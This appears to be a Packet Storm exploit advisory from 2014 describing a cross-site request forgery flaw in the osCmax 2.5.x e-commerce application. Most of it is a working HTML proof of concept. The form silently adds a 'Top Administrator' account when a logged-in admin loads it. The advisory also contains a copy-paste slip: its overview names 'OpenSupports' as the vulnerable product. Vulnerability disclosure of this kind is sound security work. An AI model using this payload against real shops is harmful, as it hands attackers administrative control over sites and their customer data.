osCmax version 2.5.x suffers from a cross site request forgery vulnerability.
5c9c9ee265cfff74fda3e4a7b303328e9c2db77708cf2c56b743ac644b394e1b[+] Author: TUNISIAN CYBER
[+] Exploit Title: osCmax 2.5.X Cross-Site Request Forgery (Add Admin) Vulnerability
[+] Date: 15-03-2014
[+] Category: WebApp
[+] Version: 2.5.X
[+] Tested on: KaliLinux/Windows 7 Pro
[+] CWE: CWE-302
[+] Vendor: http://www.oscmax.com/
[+] Friendly Sites: na3il.com,th3-creative.com
[+] Twitter: @TCYB3R
1.OVERVIEW:
OpenSupports v2.x suffers from a Cross-Site Request Forgery (Add Admin) Vulnerability.
2.Version:
2.5.X
3.Background:
osCmax is a powerful e-commerce/shopping cart web application.
osCmax has all the features needed to run a successful internet store and can be customized to whatever configuration you need.
http://www.oscmax.com/what_is_oscmax_0
4.Proof Of Concept:
<html>
<form method="post" name="newmember" action="http://127.0.0.1/catalog/admin/admin_members.php?action=member_new&page=1&mID=1">
<input type="hidden" name="admin_username" value="THETUNISIAN"/>
<input type="hidden" name="admin_firstname" value="Moot3x"/>
<input type="hidden" name="admin_lastname" value="Saad3x"/>
<input type="hidden" name="admin_email_address" value="g4k@hotmail.esxxx"/>
<input type="hidden" name="admin_groups_id" value="1"/>
<!-- About "admin_groups_id" -->
<!-- 1= Top Administrator -->
<!-- 2= Customer Service -->
<input type='submit' name='Submit4' value="Agregar">
</form>
</html>
5.Solution(s):
no contact from vendor
6.TIME-LINE:
2014-15-03: Vulnerability was discovered.
2014-15-03: Contact with vendor.
2014-16-03: No reply.
2014-17-03: No reply.
2014-17-03: Vulnerability Published
7.Greetings:
Xmax-tn
Xtech-set
N43il
Sec4ver,E4A Members
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed